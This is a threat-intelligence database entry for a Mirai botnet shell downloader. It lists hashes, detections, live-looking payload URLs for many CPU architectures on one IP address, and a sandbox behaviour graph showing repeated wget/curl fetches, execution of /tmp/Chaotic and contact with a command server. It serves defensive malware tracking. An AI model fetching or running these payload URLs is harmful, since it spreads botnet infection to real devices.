MalwareBazaar Database

You are currently viewing the MalwareBazaar entry for SHA256 101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2. While MalwareBazaar tries to identify whether the sample provided is malicious or not, there is no guarantee that a sample in MalwareBazaar is malicious.

Database Entry


Mirai


Vendor detections: 8


Intelligence 8 IOCs YARA 2 File information Comments
Download sample Add tag Delete this sample Report a False Positive

SHA256 hash: 101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2
SHA3-384 hash: 8d62f85c564de61de2bd647083faca6c6b0bbb9d0e84867963070481ad662a53b4ec4e414b4d5ac6003bc43ba8490a64
SHA1 hash: 74be0dabbcbc5ca2267090ca35eeaa061dfecb01
MD5 hash: b9ac06a1df6f5d60b5338406bd3699d2
humanhash: stairway-mars-diet-early
File name:ohshit.sh
Download: download sample
Signature Mirai
Create hunting rule
File size:3'754 bytes
First seen:2026-01-13 17:48:25 UTC
Last seen:Never
File type: sh
MIME type:text/x-shellscript
ssdeep 96:i4Pc34dc34okx340e34ey340AB34TtE34JY344e34V234m+34Sm346W34jC34u+W:XPcIdcIokxI0eIeyI0ABITiIJYI4eIVr
TLSH T1F8714FA6CA0211781C5557B2BDBA11BAF149E3E334E7FB0FBA982CF4618DF015485DD2
TrID 70.0% (.SH) Linux/UNIX shell script (7000/1)
30.0% (.) Unix-like shebang (var.3) (gen) (3000/1)
Magika shell
Reporter abuse_ch
Tags:mirai sh
URLMalware sample (SHA256 hash)SignatureTags
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arce38049a1353607de8d03af1ec86f6b12730ddc5b0567122acd8f2d9b17eb1acf Miraiarc elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86a913bba4af0db7a7827ffb5f1f0d3e53efba389ddeabfc1110d8248f70286b5d Mirai32-bit elf mirai x86-32
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.x86_6459ca6648a866cf061ecd23e25bbcf0a6d7cb8eb9627d3038eebd3be8937bfce8 Miraielf geofenced mirai opendir ua-wget USA x86
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.i686b34c99612fce65d454c6506af39919fd4c458f2d82cc80ca689a61ab5128a376 Miraielf geofenced mirai opendir ua-wget USA x86
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips965588b1f48488bbc52b4b6e09db1c6b7797f386104c2c7657cb9b8dbe0595f2 Miraielf geofenced mips mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.mips64n/an/an/a
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.mpsl6196fed0525cc2fb502f4b74be94c37f6e23fa7c9cc47422e8c9e21ef01cc37c Miraielf geofenced mips mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm59ff2222c70bc950f82239630019acd2eb893c633eccad099f1fc87996106350 Miraiarm elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm5dbd3e1ec8436a7fa499ca84de1b3625c0e0a6bde2d7a5771b91afaaaae154eb3 Miraiarm elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm62f680107bfe926af1bf63c088a8eac43b079e52c408221e19cb8441dc6617f49 Miraiarm elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.arm7a6cce14efcd5afab2356336840afd25d018cc01467fce37c42ea2e6d01a67cb4 Miraiarm elf geofenced mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.ppc7a573f3b223d9a03146d315f349d57e26f843eb44b13f994e0645b0b84f1617e Miraielf geofenced mirai opendir PowerPC ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.sparcn/an/an/a
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.m68k01a818ba418ec11bf427485e0231f252687dc274b4ad680f977a8446afc960b2 Miraielf geofenced m68k mirai opendir ua-wget USA
http://45.83.207.173/HideChaotic/ub8ehJSePAfc9FYqZIT6.sh4a65f430e9456730d2a7d22e6dc9d6b8ce4430b8ae30cd6e8cb50d6fc8cf40589 Miraielf geofenced mirai opendir SuperH ua-wget USA

Intelligence

File Origin
# of uploads :
1
# of downloads :
36
Origin country :
DE DE
Vendor Threat Intelligence
No detections
Detection(s):
Sanesecurity.Malware.30790.LX.BOT.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-29.UNOFFICIAL
Create hunting rule

SecuriteInfo.com.Linux.Downloader-6.UNOFFICIAL
Create hunting rule

Verdict:
Malicious
Threat level:
  10/10
Confidence:
100%
Tags:
busybox medusa mirai
Link:
https://www.filescan.io/uploads/696685a43827c9e1249ba9d9/reports/f5e563e4-a377-406a-a5dc-f39f5000ace8/overview
Result
Gathering data
Verdict:
Malicious
File Type:
unix shell
First seen:
2026-01-08T19:25:00Z UTC
Last seen:
2026-01-10T12:48:00Z UTC
Hits:
~10
Detections:
HEUR:Trojan-Downloader.Shell.Agent.a HEUR:Trojan-Downloader.Shell.Agent.p HEUR:Trojan-Downloader.Shell.Agent.gen
Link:
https://opentip.kaspersky.com/101d740fef21b3d8e827f9245bcbfbfd5f73273e8b6ef1125ac98539e3f8e0e2/results?tab=lookup
Status:
terminated
Link:
https://sandbox.kunai.rocks/analysis/ba2508fe-a601-497c-b75d-a5e164f0d2eb
Behavior Graph:
Download SVG
%3 guuid=83cd165e-1a00-0000-f04a-026d430b0000 pid=2883 /usr/bin/sudo guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888 /tmp/sample.bin guuid=83cd165e-1a00-0000-f04a-026d430b0000 pid=2883->guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888 execve guuid=1c56a460-1a00-0000-f04a-026d4b0b0000 pid=2891 /usr/bin/cp guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=1c56a460-1a00-0000-f04a-026d4b0b0000 pid=2891 execve guuid=17983165-1a00-0000-f04a-026d550b0000 pid=2901 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=17983165-1a00-0000-f04a-026d550b0000 pid=2901 execve guuid=f031ffbe-1a00-0000-f04a-026db40b0000 pid=2996 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=f031ffbe-1a00-0000-f04a-026db40b0000 pid=2996 execve guuid=e71df887-1b00-0000-f04a-026d000d0000 pid=3328 /usr/bin/cat guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=e71df887-1b00-0000-f04a-026d000d0000 pid=3328 execve guuid=ac8f6c88-1b00-0000-f04a-026d020d0000 pid=3330 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=ac8f6c88-1b00-0000-f04a-026d020d0000 pid=3330 execve guuid=1eb50489-1b00-0000-f04a-026d040d0000 pid=3332 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=1eb50489-1b00-0000-f04a-026d040d0000 pid=3332 clone guuid=acd4ee89-1b00-0000-f04a-026d080d0000 pid=3336 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=acd4ee89-1b00-0000-f04a-026d080d0000 pid=3336 execve guuid=ffa554e9-1b00-0000-f04a-026dbf0d0000 pid=3519 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=ffa554e9-1b00-0000-f04a-026dbf0d0000 pid=3519 execve guuid=d4e8eb4b-1c00-0000-f04a-026ddd0e0000 pid=3805 /usr/bin/cat guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=d4e8eb4b-1c00-0000-f04a-026ddd0e0000 pid=3805 execve guuid=8276514c-1c00-0000-f04a-026de00e0000 pid=3808 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=8276514c-1c00-0000-f04a-026de00e0000 pid=3808 execve guuid=9348a84c-1c00-0000-f04a-026de30e0000 pid=3811 /tmp/Chaotic delete-file net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=9348a84c-1c00-0000-f04a-026de30e0000 pid=3811 execve guuid=2b7d3409-1d00-0000-f04a-026d55110000 pid=4437 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=2b7d3409-1d00-0000-f04a-026d55110000 pid=4437 execve guuid=2713f366-1d00-0000-f04a-026d8f120000 pid=4751 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=2713f366-1d00-0000-f04a-026d8f120000 pid=4751 execve guuid=cfdbd4b1-1d00-0000-f04a-026d80130000 pid=4992 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=cfdbd4b1-1d00-0000-f04a-026d80130000 pid=4992 clone guuid=d868f2b1-1d00-0000-f04a-026d81130000 pid=4993 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=d868f2b1-1d00-0000-f04a-026d81130000 pid=4993 execve guuid=4cfb61b2-1d00-0000-f04a-026d84130000 pid=4996 /tmp/Chaotic net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=4cfb61b2-1d00-0000-f04a-026d84130000 pid=4996 execve guuid=02756066-1e00-0000-f04a-026d88140000 pid=5256 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=02756066-1e00-0000-f04a-026d88140000 pid=5256 execve guuid=1c3651cc-1f00-0000-f04a-026d90140000 pid=5264 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=1c3651cc-1f00-0000-f04a-026d90140000 pid=5264 execve guuid=3d4dcd23-2000-0000-f04a-026d97140000 pid=5271 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=3d4dcd23-2000-0000-f04a-026d97140000 pid=5271 clone guuid=f84ee823-2000-0000-f04a-026d98140000 pid=5272 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=f84ee823-2000-0000-f04a-026d98140000 pid=5272 execve guuid=3ea23e24-2000-0000-f04a-026d99140000 pid=5273 /tmp/Chaotic delete-file net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=3ea23e24-2000-0000-f04a-026d99140000 pid=5273 execve guuid=c2e3f8d7-2000-0000-f04a-026db9140000 pid=5305 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=c2e3f8d7-2000-0000-f04a-026db9140000 pid=5305 execve guuid=db8a6d47-2100-0000-f04a-026dba140000 pid=5306 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=db8a6d47-2100-0000-f04a-026dba140000 pid=5306 execve guuid=e33f138f-2100-0000-f04a-026dbb140000 pid=5307 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=e33f138f-2100-0000-f04a-026dbb140000 pid=5307 clone guuid=e607388f-2100-0000-f04a-026dbc140000 pid=5308 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=e607388f-2100-0000-f04a-026dbc140000 pid=5308 execve guuid=df92c88f-2100-0000-f04a-026dbd140000 pid=5309 /tmp/Chaotic delete-file net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=df92c88f-2100-0000-f04a-026dbd140000 pid=5309 execve guuid=2f038f43-2200-0000-f04a-026dc3140000 pid=5315 /usr/bin/wget net send-data guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=2f038f43-2200-0000-f04a-026dc3140000 pid=5315 execve guuid=8d1d4d6a-2200-0000-f04a-026dc4140000 pid=5316 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=8d1d4d6a-2200-0000-f04a-026dc4140000 pid=5316 execve guuid=58d7f5ce-2200-0000-f04a-026dc5140000 pid=5317 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=58d7f5ce-2200-0000-f04a-026dc5140000 pid=5317 clone guuid=6b761bcf-2200-0000-f04a-026dc6140000 pid=5318 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=6b761bcf-2200-0000-f04a-026dc6140000 pid=5318 execve guuid=a710accf-2200-0000-f04a-026dc7140000 pid=5319 /tmp/Chaotic delete-file net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=a710accf-2200-0000-f04a-026dc7140000 pid=5319 execve guuid=538e1584-2300-0000-f04a-026dcd140000 pid=5325 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=538e1584-2300-0000-f04a-026dcd140000 pid=5325 execve guuid=7d4105dc-2300-0000-f04a-026dce140000 pid=5326 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=7d4105dc-2300-0000-f04a-026dce140000 pid=5326 execve guuid=a21d032a-2400-0000-f04a-026dcf140000 pid=5327 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=a21d032a-2400-0000-f04a-026dcf140000 pid=5327 clone guuid=53d7412a-2400-0000-f04a-026dd0140000 pid=5328 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=53d7412a-2400-0000-f04a-026dd0140000 pid=5328 execve guuid=1e8ba52a-2400-0000-f04a-026dd1140000 pid=5329 /tmp/Chaotic net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=1e8ba52a-2400-0000-f04a-026dd1140000 pid=5329 execve guuid=802e5adf-2400-0000-f04a-026dd7140000 pid=5335 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=802e5adf-2400-0000-f04a-026dd7140000 pid=5335 execve guuid=58dfc323-2500-0000-f04a-026dd8140000 pid=5336 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=58dfc323-2500-0000-f04a-026dd8140000 pid=5336 execve guuid=bbb31172-2500-0000-f04a-026dd9140000 pid=5337 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=bbb31172-2500-0000-f04a-026dd9140000 pid=5337 clone guuid=d0c64772-2500-0000-f04a-026dda140000 pid=5338 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=d0c64772-2500-0000-f04a-026dda140000 pid=5338 execve guuid=0e84de72-2500-0000-f04a-026ddb140000 pid=5339 /tmp/Chaotic delete-file net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=0e84de72-2500-0000-f04a-026ddb140000 pid=5339 execve guuid=fe029a26-2600-0000-f04a-026de1140000 pid=5345 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=fe029a26-2600-0000-f04a-026de1140000 pid=5345 execve guuid=55aeeb6f-2600-0000-f04a-026de2140000 pid=5346 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=55aeeb6f-2600-0000-f04a-026de2140000 pid=5346 execve guuid=4c7ebda4-2600-0000-f04a-026de3140000 pid=5347 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=4c7ebda4-2600-0000-f04a-026de3140000 pid=5347 clone guuid=e894e2a4-2600-0000-f04a-026de4140000 pid=5348 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=e894e2a4-2600-0000-f04a-026de4140000 pid=5348 execve guuid=ba2e7ca5-2600-0000-f04a-026de5140000 pid=5349 /tmp/Chaotic delete-file net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=ba2e7ca5-2600-0000-f04a-026de5140000 pid=5349 execve guuid=13547a59-2700-0000-f04a-026deb140000 pid=5355 /usr/bin/wget net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=13547a59-2700-0000-f04a-026deb140000 pid=5355 execve guuid=baaaaba0-2900-0000-f04a-026df6140000 pid=5366 /usr/bin/curl net send-data write-file guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=baaaaba0-2900-0000-f04a-026df6140000 pid=5366 execve guuid=e1aee4d8-2a00-0000-f04a-026df7140000 pid=5367 /usr/bin/bash guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=e1aee4d8-2a00-0000-f04a-026df7140000 pid=5367 clone guuid=acef24d9-2a00-0000-f04a-026df8140000 pid=5368 /usr/bin/chmod guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=acef24d9-2a00-0000-f04a-026df8140000 pid=5368 execve guuid=009974d9-2a00-0000-f04a-026df9140000 pid=5369 /tmp/Chaotic net guuid=36dce65f-1a00-0000-f04a-026d480b0000 pid=2888->guuid=009974d9-2a00-0000-f04a-026df9140000 pid=5369 execve 7aaffefd-71a9-5a82-9005-3d1c8abcbc1a 45.83.207.173:80 guuid=17983165-1a00-0000-f04a-026d550b0000 pid=2901->7aaffefd-71a9-5a82-9005-3d1c8abcbc1a send: 164B guuid=f031ffbe-1a00-0000-f04a-026db40b0000 pid=2996->7aaffefd-71a9-5a82-9005-3d1c8abcbc1a send: 113B guuid=acd4ee89-1b00-0000-f04a-026d080d0000 pid=3336->7aaffefd-71a9-5a82-9005-3d1c8abcbc1a send: 164B guuid=ffa554e9-1b00-0000-f04a-026dbf0d0000 pid=3519->7aaffefd-71a9-5a82-9005-3d1c8abcbc1a send: 113B 8b0a01dc-0728-52c1-8024-c4ba7801b8d6 8.8.8.8:53 guuid=9348a84c-1c00-0000-f04a-026de30e0000 pid=3811->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=51c8744d-1c00-0000-f04a-026dea0e0000 pid=3818 /tmp/Chaotic guuid=9348a84c-1c00-0000-f04a-026de30e0000 pid=3811->guuid=51c8744d-1c00-0000-f04a-026dea0e0000 pid=3818 clone guuid=6b4b1f89-1c00-0000-f04a-026da90f0000 pid=4009 /tmp/Chaotic guuid=9348a84c-1c00-0000-f04a-026de30e0000 pid=3811->guuid=6b4b1f89-1c00-0000-f04a-026da90f0000 pid=4009 clone guuid=3e22cbc4-1c00-0000-f04a-026d63100000 pid=4195 /tmp/Chaotic guuid=9348a84c-1c00-0000-f04a-026de30e0000 pid=3811->guuid=3e22cbc4-1c00-0000-f04a-026d63100000 pid=4195 clone guuid=46397400-1d00-0000-f04a-026d3e110000 pid=4414 /tmp/Chaotic guuid=9348a84c-1c00-0000-f04a-026de30e0000 pid=3811->guuid=46397400-1d00-0000-f04a-026d3e110000 pid=4414 clone guuid=3df17900-1d00-0000-f04a-026d3f110000 pid=4415 /tmp/Chaotic dns net send-data zombie guuid=9348a84c-1c00-0000-f04a-026de30e0000 pid=3811->guuid=3df17900-1d00-0000-f04a-026d3f110000 pid=4415 clone guuid=3df17900-1d00-0000-f04a-026d3f110000 pid=4415->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con 4f6baed0-9587-596c-82b3-fd721afe4cc1 10.0.2.3:53 guuid=3df17900-1d00-0000-f04a-026d3f110000 pid=4415->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 1368B 3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 weifang.serveftp.com:3778 guuid=3df17900-1d00-0000-f04a-026d3f110000 pid=4415->3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 send: 180B ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 weifang.serveftp.com:80 guuid=2b7d3409-1d00-0000-f04a-026d55110000 pid=4437->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 167B guuid=2713f366-1d00-0000-f04a-026d8f120000 pid=4751->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 116B guuid=4cfb61b2-1d00-0000-f04a-026d84130000 pid=4996->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=819609b3-1d00-0000-f04a-026d87130000 pid=4999 /tmp/Chaotic guuid=4cfb61b2-1d00-0000-f04a-026d84130000 pid=4996->guuid=819609b3-1d00-0000-f04a-026d87130000 pid=4999 clone guuid=6090b1ee-1d00-0000-f04a-026d46140000 pid=5190 /tmp/Chaotic guuid=4cfb61b2-1d00-0000-f04a-026d84130000 pid=4996->guuid=6090b1ee-1d00-0000-f04a-026d46140000 pid=5190 clone guuid=78d6572a-1e00-0000-f04a-026d7d140000 pid=5245 /tmp/Chaotic guuid=4cfb61b2-1d00-0000-f04a-026d84130000 pid=4996->guuid=78d6572a-1e00-0000-f04a-026d7d140000 pid=5245 clone guuid=7a720b66-1e00-0000-f04a-026d86140000 pid=5254 /tmp/Chaotic delete-file guuid=4cfb61b2-1d00-0000-f04a-026d84130000 pid=4996->guuid=7a720b66-1e00-0000-f04a-026d86140000 pid=5254 clone guuid=e22c1966-1e00-0000-f04a-026d87140000 pid=5255 /tmp/Chaotic dns net send-data zombie guuid=4cfb61b2-1d00-0000-f04a-026d84130000 pid=4996->guuid=e22c1966-1e00-0000-f04a-026d87140000 pid=5255 clone guuid=e22c1966-1e00-0000-f04a-026d87140000 pid=5255->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=e22c1966-1e00-0000-f04a-026d87140000 pid=5255->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 1216B guuid=e22c1966-1e00-0000-f04a-026d87140000 pid=5255->3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 send: 160B guuid=02756066-1e00-0000-f04a-026d88140000 pid=5256->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 165B guuid=1c3651cc-1f00-0000-f04a-026d90140000 pid=5264->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 114B guuid=3ea23e24-2000-0000-f04a-026d99140000 pid=5273->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=a7c8d524-2000-0000-f04a-026d9a140000 pid=5274 /tmp/Chaotic guuid=3ea23e24-2000-0000-f04a-026d99140000 pid=5273->guuid=a7c8d524-2000-0000-f04a-026d9a140000 pid=5274 clone guuid=c8967f60-2000-0000-f04a-026da8140000 pid=5288 /tmp/Chaotic guuid=3ea23e24-2000-0000-f04a-026d99140000 pid=5273->guuid=c8967f60-2000-0000-f04a-026da8140000 pid=5288 clone guuid=c1492c9c-2000-0000-f04a-026db6140000 pid=5302 /tmp/Chaotic guuid=3ea23e24-2000-0000-f04a-026d99140000 pid=5273->guuid=c1492c9c-2000-0000-f04a-026db6140000 pid=5302 clone guuid=02e0d9d7-2000-0000-f04a-026db7140000 pid=5303 /tmp/Chaotic guuid=3ea23e24-2000-0000-f04a-026d99140000 pid=5273->guuid=02e0d9d7-2000-0000-f04a-026db7140000 pid=5303 clone guuid=5857e1d7-2000-0000-f04a-026db8140000 pid=5304 /tmp/Chaotic dns net send-data zombie guuid=3ea23e24-2000-0000-f04a-026d99140000 pid=5273->guuid=5857e1d7-2000-0000-f04a-026db8140000 pid=5304 clone guuid=5857e1d7-2000-0000-f04a-026db8140000 pid=5304->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=5857e1d7-2000-0000-f04a-026db8140000 pid=5304->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 912B guuid=5857e1d7-2000-0000-f04a-026db8140000 pid=5304->3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 send: 120B guuid=c2e3f8d7-2000-0000-f04a-026db9140000 pid=5305->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 165B guuid=db8a6d47-2100-0000-f04a-026dba140000 pid=5306->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 114B guuid=df92c88f-2100-0000-f04a-026dbd140000 pid=5309->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=4ebd6e90-2100-0000-f04a-026dbe140000 pid=5310 /tmp/Chaotic guuid=df92c88f-2100-0000-f04a-026dbd140000 pid=5309->guuid=4ebd6e90-2100-0000-f04a-026dbe140000 pid=5310 clone guuid=f4ea19cc-2100-0000-f04a-026dbf140000 pid=5311 /tmp/Chaotic guuid=df92c88f-2100-0000-f04a-026dbd140000 pid=5309->guuid=f4ea19cc-2100-0000-f04a-026dbf140000 pid=5311 clone guuid=def7c107-2200-0000-f04a-026dc0140000 pid=5312 /tmp/Chaotic guuid=df92c88f-2100-0000-f04a-026dbd140000 pid=5309->guuid=def7c107-2200-0000-f04a-026dc0140000 pid=5312 clone guuid=1c866b43-2200-0000-f04a-026dc1140000 pid=5313 /tmp/Chaotic guuid=df92c88f-2100-0000-f04a-026dbd140000 pid=5309->guuid=1c866b43-2200-0000-f04a-026dc1140000 pid=5313 clone guuid=aad17343-2200-0000-f04a-026dc2140000 pid=5314 /tmp/Chaotic dns net send-data zombie guuid=df92c88f-2100-0000-f04a-026dbd140000 pid=5309->guuid=aad17343-2200-0000-f04a-026dc2140000 pid=5314 clone guuid=aad17343-2200-0000-f04a-026dc2140000 pid=5314->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=aad17343-2200-0000-f04a-026dc2140000 pid=5314->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 912B guuid=aad17343-2200-0000-f04a-026dc2140000 pid=5314->3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 send: 115B guuid=2f038f43-2200-0000-f04a-026dc3140000 pid=5315->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 167B guuid=8d1d4d6a-2200-0000-f04a-026dc4140000 pid=5316->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 116B guuid=a710accf-2200-0000-f04a-026dc7140000 pid=5319->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=ae49e7d0-2200-0000-f04a-026dc8140000 pid=5320 /tmp/Chaotic guuid=a710accf-2200-0000-f04a-026dc7140000 pid=5319->guuid=ae49e7d0-2200-0000-f04a-026dc8140000 pid=5320 clone guuid=7910920c-2300-0000-f04a-026dc9140000 pid=5321 /tmp/Chaotic guuid=a710accf-2200-0000-f04a-026dc7140000 pid=5319->guuid=7910920c-2300-0000-f04a-026dc9140000 pid=5321 clone guuid=a4564748-2300-0000-f04a-026dca140000 pid=5322 /tmp/Chaotic guuid=a710accf-2200-0000-f04a-026dc7140000 pid=5319->guuid=a4564748-2300-0000-f04a-026dca140000 pid=5322 clone guuid=03f3f583-2300-0000-f04a-026dcb140000 pid=5323 /tmp/Chaotic guuid=a710accf-2200-0000-f04a-026dc7140000 pid=5319->guuid=03f3f583-2300-0000-f04a-026dcb140000 pid=5323 clone guuid=f113fd83-2300-0000-f04a-026dcc140000 pid=5324 /tmp/Chaotic dns net send-data zombie guuid=a710accf-2200-0000-f04a-026dc7140000 pid=5319->guuid=f113fd83-2300-0000-f04a-026dcc140000 pid=5324 clone guuid=f113fd83-2300-0000-f04a-026dcc140000 pid=5324->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=f113fd83-2300-0000-f04a-026dcc140000 pid=5324->4f6baed0-9587-596c-82b3-fd721afe4cc1 send: 798B guuid=f113fd83-2300-0000-f04a-026dcc140000 pid=5324->3ec2bfaf-8e71-5eeb-b8ce-6ffe78958b80 send: 105B guuid=538e1584-2300-0000-f04a-026dcd140000 pid=5325->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 165B guuid=7d4105dc-2300-0000-f04a-026dce140000 pid=5326->ac95fc9c-d1d6-5e11-ae35-1b1f0a26f841 send: 114B guuid=1e8ba52a-2400-0000-f04a-026dd1140000 pid=5329->8b0a01dc-0728-52c1-8024-c4ba7801b8d6 con guuid=1af1d42b-2400-0000-f04a-026dd2140000 pid=5330 /tmp/Chaotic guuid=1e8ba52a-2400-0000-f04a-026dd1140000 pid=5329->guuid=1af1d42b-2400-0000-f04a-026dd2140000 pid=5330 clone guuid=eeb28667-2400-0000-f04a-026dd3140000 pid=5331 /tmp/Chaotic guuid=1e8ba52a-2400-0000-f04a-026dd1140000 pid=5329->guuid=eeb28667-2400-0000-f04a-026dd3140000 pid=5331 clone guuid=027a3ca3-2400-0000-f04a-026dd4140000 pid=5332 /tmp/Chaotic guuid=1e8ba52a-2400-0000-f04a-026dd1140000 pid=5329->guuid=027a3ca3-2400-0000-f04a-026dd4140000 pid=5332 clone guuid=42f2efde-2400-0000-f04a-026dd5140000 pid=5333 /tmp/Chaotic delete-file guuid=1e8ba52a-2400-0000-f04a-026dd1140000 pid=5329->guuid=42f2efde-2400-0000-f04a-026dd5140000 pid=5333 clone guuid=65cbfade-2400-0000-f04a-026dd6140000 pid=5334 /tmp/Chaotic dns net send-data zombie guuid=1e8ba52a-2400-0000-f04a-026dd1140000 pid=5329->guuid=65cbfade-2400-0000-f04a-026dd6140000 pid=5334 clone guuid=65cbfade-2400-0000-f04a-026dd6140000 